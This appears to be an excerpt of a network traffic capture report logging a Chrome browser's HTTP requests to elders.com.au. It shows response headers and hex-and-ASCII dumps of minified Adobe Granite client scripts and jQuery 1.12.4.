                                                                                                                                                                                                            2024-11-06 05:29:55 UTC758INData Raw: 32 31 35 31 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 63 28 29 3a 28 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 3d 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 7c 7c 7b 7d 29 2e 53 6c 69 6e 67 3d 63 28 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 53 45 4c 45 43 54 4f 52 5f 49 4e 46 49 4e 49 54 59 3a 22 2e 69 6e 66 69 6e 69 74 79 22 2c 43 48 41 52 53 45 54 3a 22 5f 63 68 61 72 73 65 74 5f 22 2c 53 54 41 54 55 53 3a 22 3a 73 74 61 74 75 73 22 2c 53 54 41 54 55 53 5f 42 52 4f 57 53 45 52 3a 22 62 72 6f 77 73 65 72 22 2c 4f 50 45 52 41 54 49 4f 4e 3a 22 3a 6f 70 65 72 61 74
                                                                                                                                                                                                            Data Ascii: 2151(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).Sling=c()})(function(){return{SELECTOR_INFINITY:".infinity",CHARSET:"_charset_",STATUS:":status",STATUS_BROWSER:"browser",OPERATION:":operat
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 74 69 6c 3d 63 28 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 70 61 74 63 68 54 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 63 2c 68 29 7b 69 66 28 68 29 69 66 28 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 21 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 68 29 29 63 3d 63 2e 72 65 70 6c 61 63 65 28 22 7b 30 7d 22 2c 68 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 68 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 63 3d 63 2e 72 65 70 6c 61 63 65 28 22 7b 22 2b 65 2b 22 7d 22 2c 68 5b 65 5d 29 3b 72 65 74 75 72 6e 20 63 7d 2c 67 65 74 54 6f 70 57 69 6e 64 6f 77 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 77 69 6e 64 6f 77 3b 69 66 28 74 68 69 73 2e 69 46 72 61 6d 65
                                                                                                                                                                                                            Data Ascii: til=c()})(function(){return{patchText:function(c,h){if(h)if("[object Array]"!==Object.prototype.toString.call(h))c=c.replace("{0}",h);else for(var e=0;e<h.length;e++)c=c.replace("{"+e+"}",h[e]);return c},getTopWindow:function(){var c=window;if(this.iFrame
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 29 7b 6e 75 6c 6c 3d 3d 3d 65 26 26 28 65 3d 64 2e 64 65 74 65 63 74 43 6f 6e 74 65 78 74 50 61 74 68 28 29 29 3b 72 65 74 75 72 6e 20 65 7d 2c 64 65 74 65 63 74 43 6f 6e 74 65 78 74 50 61 74 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 43 51 55 52 4c 49 6e 66 6f 29 65 3d 43 51 55 52 4c 49 6e 66 6f 2e 63 6f 6e 74 65 78 74 50 61 74 68 7c 7c 22 22 3b 65 6c 73 65 7b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 2c 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 7b 76 61 72 20 66 3d 6d 2e 65 78 65 63 28 61 5b 62 5d 2e 73 72 63 29 3b 69 66 28 66 29 72 65 74 75 72 6e 20 65 3d 66 5b 31 5d 7d 65 3d
                                                                                                                                                                                                            Data Ascii: nction(){null===e&&(e=d.detectContextPath());return e},detectContextPath:function(){try{if(window.CQURLInfo)e=CQURLInfo.contextPath||"";else{for(var a=document.getElementsByTagName("script"),b=0;b<a.length;b++){var f=m.exec(a[b].src);if(f)return e=f[1]}e=
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 61 63 65 28 2f 25 35 44 2f 67 2c 22 5d 22 29 3b 61 3d 61 2e 72 65 70 6c 61 63 65 28 2f 5c 3f 2f 67 2c 22 25 33 46 22 29 3b 72 65 74 75 72 6e 20 61 3d 61 2e 72 65 70 6c 61 63 65 28 2f 23 2f 67 2c 22 25 32 33 22 29 7d 2c 68 61 6e 64 6c 65 4c 6f 67 69 6e 52 65 64 69 72 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 6e 29 7b 6e 3d 0a 21 30 3b 61 6c 65 72 74 28 47 72 61 6e 69 74 65 2e 49 31 38 6e 2e 67 65 74 28 22 59 6f 75 72 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 63 6f 6d 70 6c 65 74 65 64 20 62 65 63 61 75 73 65 20 79 6f 75 20 68 61 76 65 20 62 65 65 6e 20 73 69 67 6e 65 64 20 6f 75 74 2e 22 29 29 3b 76 61 72 20 61 3d 63 2e 67 65 74 54 6f 70 57 69 6e 64 6f 77 28 29 2e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3b
                                                                                                                                                                                                            Data Ascii: ace(/%5D/g,"]");a=a.replace(/\?/g,"%3F");return a=a.replace(/#/g,"%23")},handleLoginRedirect:function(){if(!n){n=!0;alert(Granite.I18n.get("Your request could not be completed because you have been signed out."));var a=c.getTopWindow().document.location;
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 62 3d 62 7c 7c 64 2e 67 65 74 4c 6f 63 61 6c 65 28 29 3b 69 66 28 21 68 5b 62 5d 29 7b 70 3d 30 3d 3d 3d 62 2e 69 6e 64 65 78 4f 66 28 64 2e 50 53 45 55 44 4f 5f 4c 41 4e 47 55 41 47 45 29 3b 74 72 79 7b 76 61 72 20 66 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2c 6c 3d 66 2e 6f 70 65 6e 2c 6b 3d 63 2e 65 78 74 65 72 6e 61 6c 69 7a 65 3b 76 61 72 20 71 3d 62 3b 69 66 28 61 29 76 61 72 20 72 3d 65 2b 71 2b 6d 3b 65 6c 73 65 7b 76 61 72 20 74 2c 75 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 68 74 6d 6c 22 29 3b 75 26 26 28 74 3d 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 69 31 38 6e 2d 64 69 63 74 69 6f 6e 61 72 79 2d 73 72 63 22 29 29 3b 72 3d 74 3f 74 2e 72 65 70 6c 61 63 65 28 22 7b 6c 6f
                                                                                                                                                                                                            Data Ascii: b=b||d.getLocale();if(!h[b]){p=0===b.indexOf(d.PSEUDO_LANGUAGE);try{var f=new XMLHttpRequest,l=f.open,k=c.externalize;var q=b;if(a)var r=e+q+m;else{var t,u=document.querySelector("html");u&&(t=u.getAttribute("data-i18n-dictionary-src"));r=t?t.replace("{lo
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 28 29 7d 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 63 28 29 3a 28 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 3d 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 7c 7c 7b 7d 29 2e 54 6f 75 63 68 49 6e 64 69 63 61 74 6f 72 3d 63 28 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 7b 7d 2c 68 3d 5b 5d 3b 72 65 74 75 72 6e 7b 64 65 62 75 67 57 69 74 68 4d 6f 75 73 65 3a 21 31 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 65 2e 75 70 64 61 74 65 28 67 2e 74 6f 75 63 68 65 73 29 3b 72 65 74 75 72 6e 21 30
                                                                                                                                                                                                            Data Ascii: ()});(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).TouchIndicator=c()})(function(){var c={},h=[];return{debugWithMouse:!1,init:function(){var e=this,m=function(g){e.update(g.touches);return!0
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC934INData Raw: 29 7d 3b 68 2e 67 65 74 43 6f 6f 6b 69 65 4e 61 6d 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 68 2e 67 65 74 57 68 69 74 65 6c 69 73 74 43 6f 6f 6b 69 65 4e 61 6d 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 3b 68 2e 69 73 4f 70 74 65 64 4f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 67 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 70 3d 30 3b 70 3c 67 2e 6c 65 6e 67 74 68 3b 70 2b 2b 29 7b 76 61 72 20 6e 3d 67 5b 70 5d 2e 73 70 6c 69 74 28 22 5c 78 33 64 22 29 5b 30 5d 3b 6e 3d 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 3f 6e 2e 74 72 69 6d 28 29 3a 6e 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30
                                                                                                                                                                                                            Data Ascii: )};h.getCookieNames=function(){return e};h.getWhitelistCookieNames=function(){return m};h.isOptedOut=function(){for(var g=document.cookie.split(";"),p=0;p<g.length;p++){var n=g[p].split("\x3d")[0];n=String.prototype.trim?n.trim():n.replace(/^[\s\uFEFF\xA0
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            140192.168.2.457824172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC766OUTGET /etc.clientlibs/clientlibs/granite/jquery.lc-f9e8e8c279baf6a1a278042afe4f395a-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC624INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:55 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Wed, 25 Sep 2024 07:45:08 GMT
                                                                                                                                                                                                            etag: W/"18d32-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 981255
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210109-DFW
                                                                                                                                                                                                            x-cache: HIT
                                                                                                                                                                                                            x-timer: S1727292578.327113,VS0,VS0,VE1
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b04aae5a6b34-DFW
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC745INData Raw: 37 64 32 65 0d 0a 2f 2a 0a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 31 2e 31 32 2e 34 2d 61 65 6d 0a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 0a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 68 74 74 70 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 0a 20 44 61 74 65 3a 20 32 30 31 36 2d 30 35 2d 32 30 54 31 37 3a 31 37 5a 0a 20 53 69 7a 7a 6c
                                                                                                                                                                                                            Data Ascii: 7d2e/* jQuery JavaScript Library v1.12.4-aem http://jquery.com/ Includes Sizzle.js http://sizzlejs.com/ Copyright jQuery Foundation and other contributors Released under the MIT license http://jquery.org/license Date: 2016-05-20T17:17Z Sizzl
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6e 61 28 6a 61 29 7d 3a 6e 61 28 79 29 7d 29 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 79 2c 6e 61 29 7b 66 75 6e 63 74 69 6f 6e 20 6a 61 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65 6e 67 74 68 22 69 6e 20 61 26 26 61 2e 6c 65 6e 67 74 68 2c 64 3d 63 2e 74 79 70 65 28 61 29 3b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 64 7c 7c 63 2e 69 73 57 69 6e 64 6f 77 28 61 29 3f 21 31 3a 22 61 72 72 61 79 22 3d 3d 3d 64 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 79
                                                                                                                                                                                                            Data Ascii: "jQuery requires a window with a document");return na(ja)}:na(y)})("undefined"!==typeof window?window:this,function(y,na){function ja(a){var b=!!a&&"length"in a&&a.length,d=c.type(a);return"function"===d||c.isWindow(a)?!1:"array"===d||0===b||"number"===ty
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 21 30 7d 0a 66 75 6e 63 74 69 6f 6e 20 53 62 28 61 2c 62 2c 64 2c 65 29 7b 69 66 28 58 61 28 61 29 29 7b 76 61 72 20 66 3d 63 2e 65 78 70 61 6e 64 6f 2c 67 3d 61 2e 6e 6f 64 65 54 79 70 65 2c 6b 3d 67 3f 63 2e 63 61 63 68 65 3a 61 2c 6d 3d 67 3f 61 5b 66 5d 3a 61 5b 66 5d 26 26 66 3b 69 66 28 6d 26 26 6b 5b 6d 5d 26 26 28 65 7c 7c 6b 5b 6d 5d 2e 64 61 74 61 29 7c 7c 76 6f 69 64 20 30 21 3d 3d 64 7c 7c 22 73 74 72 69 6e 67 22 21 3d 3d 74 79 70 65 6f 66 20 62 29 7b 6d 7c 7c 28 6d 3d 67 3f 61 5b 66 5d 3d 76 61 2e 70 6f 70 28 29 7c 7c 63 2e 67 75 69 64 2b 2b 3a 66 29 3b 6b 5b 6d 5d 7c 7c 28 6b 5b 6d 5d 3d 67 3f 7b 7d 3a 7b 74 6f 4a 53 4f 4e 3a 63 2e 6e 6f 6f 70 7d 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 62 7c 7c 22 66 75 6e 63 74
                                                                                                                                                                                                            Data Ascii: !0}function Sb(a,b,d,e){if(Xa(a)){var f=c.expando,g=a.nodeType,k=g?c.cache:a,m=g?a[f]:a[f]&&f;if(m&&k[m]&&(e||k[m].data)||void 0!==d||"string"!==typeof b){m||(m=g?a[f]=va.pop()||c.guid++:f);k[m]||(k[m]=g?{}:{toJSON:c.noop});if("object"===typeof b||"funct
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 69 73 74 20 64 65 74 61 69 6c 73 20 64 69 61 6c 6f 67 20 66 69 67 63 61 70 74 69 6f 6e 20 66 69 67 75 72 65 20 66 6f 6f 74 65 72 20 68 65 61 64 65 72 20 68 67 72 6f 75 70 20 6d 61 69 6e 20 6d 61 72 6b 20 6d 65 74 65 72 20 6e 61 76 20 6f 75 74 70 75 74 20 70 69 63 74 75 72 65 20 70 72 6f 67 72 65 73 73 20 73 65 63 74 69 6f 6e 20 73 75 6d 6d 61 72 79 20 74 65 6d 70 6c 61 74 65 20 74 69 6d 65 20 76 69 64 65 6f 22 2e 73 70 6c 69 74 28 22 20 22 29 3b 61 3d 0a 61 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 3b 69 66 28 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 29 66 6f 72 28 3b 62 2e 6c 65 6e 67 74 68 3b 29 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 2e 70 6f 70 28 29 29 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                            Data Ascii: ist details dialog figcaption figure footer header hgroup main mark meter nav output picture progress section summary template time video".split(" ");a=a.createDocumentFragment();if(a.createElement)for(;b.length;)a.createElement(b.pop());return a}functio
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 64 28 71 29 3b 63 2e 6d 65 72 67 65 28 51 2c 6d 2e 63 68 69 6c 64 4e 6f 64 65 73 29 3b 66 6f 72 28 6d 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 22 22 3b 6d 2e 66 69 72 73 74 43 68 69 6c 64 3b 29 6d 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6d 2e 66 69 72 73 74 43 68 69 6c 64 29 3b 6d 3d 42 2e 6c 61 73 74 43 68 69 6c 64 7d 65 6c 73 65 20 51 2e 70 75 73 68 28 62 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6b 29 29 3b 6d 26 26 42 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6d 29 3b 7a 2e 61 70 70 65 6e 64 43 68 65 63 6b 65 64 7c 7c 63 2e 67 72 65 70 28 65 61 28 51 2c 22 69 6e 70 75 74 22 29 2c 55 63 29 3b 66 6f 72 28 4c 3d 30 3b 6b 3d 51 5b 4c 2b 2b 5d 3b 29 69 66 28 65 26 26 2d 31 3c 63 2e 69 6e 41 72 72 61 79 28 6b 2c 65 29 29 66 26 26 66 2e 70 75 73 68 28 6b 29
                                                                                                                                                                                                            Data Ascii: d(q);c.merge(Q,m.childNodes);for(m.textContent="";m.firstChild;)m.removeChild(m.firstChild);m=B.lastChild}else Q.push(b.createTextNode(k));m&&B.removeChild(m);z.appendChecked||c.grep(ea(Q,"input"),Uc);for(L=0;k=Q[L++];)if(e&&-1<c.inArray(k,e))f&&f.push(k)
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 2e 65 76 65 6e 74 73 3b 69 66 28 67 29 66 6f 72 28 64 20 69 6e 20 64 65 6c 65 74 65 20 61 2e 68 61 6e 64 6c 65 2c 61 2e 65 76 65 6e 74 73 3d 7b 7d 2c 67 29 66 6f 72 28 66 3d 30 2c 65 3d 67 5b 64 5d 2e 6c 65 6e 67 74 68 3b 66 3c 65 3b 66 2b 2b 29 63 2e 65 76 65 6e 74 2e 61 64 64 28 62 2c 64 2c 67 5b 64 5d 5b 66 5d 29 3b 61 2e 64 61 74 61 26 26 28 61 2e 64 61 74 61 3d 63 2e 65 78 74 65 6e 64 28 7b 7d 2c 61 2e 64 61 74 61 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 47 61 28 61 2c 62 2c 64 2c 65 29 7b 62 3d 65 63 2e 61 70 70 6c 79 28 5b 5d 2c 62 29 3b 76 61 72 20 66 2c 67 3d 30 2c 6b 3d 61 2e 6c 65 6e 67 74 68 2c 6d 3d 6b 2d 31 2c 70 3d 62 5b 30 5d 2c 71 3d 63 2e 69 73 46 75 6e 63 74 69 6f 6e 28 70 29 3b 69 66 28 71 7c 7c 31 3c 6b 26 26 22 73 74 72 69 6e 67 22 3d
                                                                                                                                                                                                            Data Ascii: .events;if(g)for(d in delete a.handle,a.events={},g)for(f=0,e=g[d].length;f<e;f++)c.event.add(b,d,g[d][f]);a.data&&(a.data=c.extend({},a.data))}}function Ga(a,b,d,e){b=ec.apply([],b);var f,g=0,k=a.length,m=k-1,p=b[0],q=c.isFunction(p);if(q||1<k&&"string"=
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 7c 7c 59 61 5b 30 5d 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 29 2e 64 6f 63 75 6d 65 6e 74 2c 62 2e 77 72 69 74 65 28 29 2c 62 2e 63 6c 6f 73 65 28 29 2c 64 3d 67 63 28 61 2c 62 29 2c 59 61 2e 64 65 74 61 63 68 28 29 29 2c 68 63 5b 61 5d 3d 64 29 3b 72 65 74 75 72 6e 20 64 7d 66 75 6e 63 74 69 6f 6e 20 77 62 28 61 2c 0a 62 29 7b 72 65 74 75 72 6e 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 28 29 29 64 65 6c 65 74 65 20 74 68 69 73 2e 67 65 74 3b 65 6c 73 65 20 72 65 74 75 72 6e 28 74 68 69 73 2e 67 65 74 3d 62 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 69 63 28 61 29 7b 69 66 28 61 20 69 6e 20 6a 63 29 72 65 74 75 72 6e 20 61 3b 66
                                                                                                                                                                                                            Data Ascii: contentWindow||Ya[0].contentDocument).document,b.write(),b.close(),d=gc(a,b),Ya.detach()),hc[a]=d);return d}function wb(a,b){return{get:function(){if(a())delete this.get;else return(this.get=b).apply(this,arguments)}}}function ic(a){if(a in jc)return a;f
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 3d 3d 66 29 7b 66 3d 49 61 28 61 2c 62 2c 67 29 3b 69 66 28 30 3e 66 7c 7c 6e 75 6c 6c 3d 3d 66 29 66 3d 61 2e 73 74 79 6c 65 5b 62 5d 3b 69 66 28 64 62 2e 74 65 73 74 28 66 29 29 72 65 74 75 72 6e 20 66 3b 65 3d 6b 26 26 28 7a 2e 62 6f 78 53 69 7a 69 6e 67 52 65 6c 69 61 62 6c 65 28 29 7c 7c 66 3d 3d 3d 61 2e 73 74 79 6c 65 5b 62 5d 29 3b 66 3d 70 61 72 73 65 46 6c 6f 61 74 28 66 29 7c 7c 30 7d 72 65 74 75 72 6e 20 66 2b 6e 63 28 61 2c 62 2c 64 7c 7c 28 6b 3f 22 62 6f 72 64 65 72 22 3a 22 63 6f 6e 74 65 6e 74 22 29 2c 65 2c 67 29 2b 22 70 78 22 7d 66 75 6e 63 74 69 6f 6e 20 68 61 28 61 2c 62 2c 64 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 68 61 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 28 61 2c 62 2c 64 2c 65 2c 66 29 7d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                            Data Ascii: ==f){f=Ia(a,b,g);if(0>f||null==f)f=a.style[b];if(db.test(f))return f;e=k&&(z.boxSizingReliable()||f===a.style[b]);f=parseFloat(f)||0}return f+nc(a,b,d||(k?"border":"content"),e,g)+"px"}function ha(a,b,d,e,f){return new ha.prototype.init(a,b,d,e,f)}functio
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 5b 5d 2c 63 72 65 61 74 65 54 77 65 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 71 2c 74 29 7b 71 3d 63 2e 54 77 65 65 6e 28 61 2c 70 2e 6f 70 74 73 2c 71 2c 74 2c 70 2e 6f 70 74 73 2e 73 70 65 63 69 61 6c 45 61 73 69 6e 67 5b 71 5d 7c 7c 70 2e 6f 70 74 73 2e 65 61 73 69 6e 67 29 3b 70 2e 74 77 65 65 6e 73 2e 70 75 73 68 28 71 29 3b 72 65 74 75 72 6e 20 71 7d 2c 73 74 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 71 29 7b 76 61 72 20 74 3d 30 2c 76 3d 71 3f 70 2e 74 77 65 65 6e 73 2e 6c 65 6e 67 74 68 3a 30 3b 69 66 28 65 29 72 65 74 75 72 6e 20 74 68 69 73 3b 66 6f 72 28 65 3d 21 30 3b 74 3c 76 3b 74 2b 2b 29 70 2e 74 77 65 65 6e 73 5b 74 5d 2e 72 75 6e 28 31 29 3b 71 3f 28 6b 2e 6e 6f 74 69 66 79 57 69 74 68 28 61 2c 5b 70 2c 31 2c 30 5d 29 2c 6b 2e 72 65 73 6f 6c 76 65
                                                                                                                                                                                                            Data Ascii: [],createTween:function(q,t){q=c.Tween(a,p.opts,q,t,p.opts.specialEasing[q]||p.opts.easing);p.tweens.push(q);return q},stop:function(q){var t=0,v=q?p.tweens.length:0;if(e)return this;for(e=!0;t<v;t++)p.tweens[t].run(1);q?(k.notifyWith(a,[p,1,0]),k.resolve
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 65 78 74 65 6e 64 28 21 30 2c 61 2c 64 29 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 61 64 28 61 29 7b 69 66 28 21 63 2e 63 6f 6e 74 61 69 6e 73 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 43 2c 61 29 29 72 65 74 75 72 6e 21 30 3b 0a 66 6f 72 28 3b 61 26 26 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 3b 29 7b 69 66 28 22 6e 6f 6e 65 22 3d 3d 3d 28 61 2e 73 74 79 6c 65 26 26 61 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 7c 7c 63 2e 63 73 73 28 61 2c 22 64 69 73 70 6c 61 79 22 29 29 7c 7c 22 68 69 64 64 65 6e 22 3d 3d 3d 61 2e 74 79 70 65 29 72 65 74 75 72 6e 21 30 3b 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 7a 62 28 61 2c 62 2c 64 2c 65 29 7b 76 61 72 20 66 3b 69 66 28 63 2e 69
                                                                                                                                                                                                            Data Ascii: extend(!0,a,d);return a}function ad(a){if(!c.contains(a.ownerDocument||C,a))return!0;for(;a&&1===a.nodeType;){if("none"===(a.style&&a.style.display||c.css(a,"display"))||"hidden"===a.type)return!0;a=a.parentNode}return!1}function zb(a,b,d,e){var f;if(c.i


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            141192.168.2.457827162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
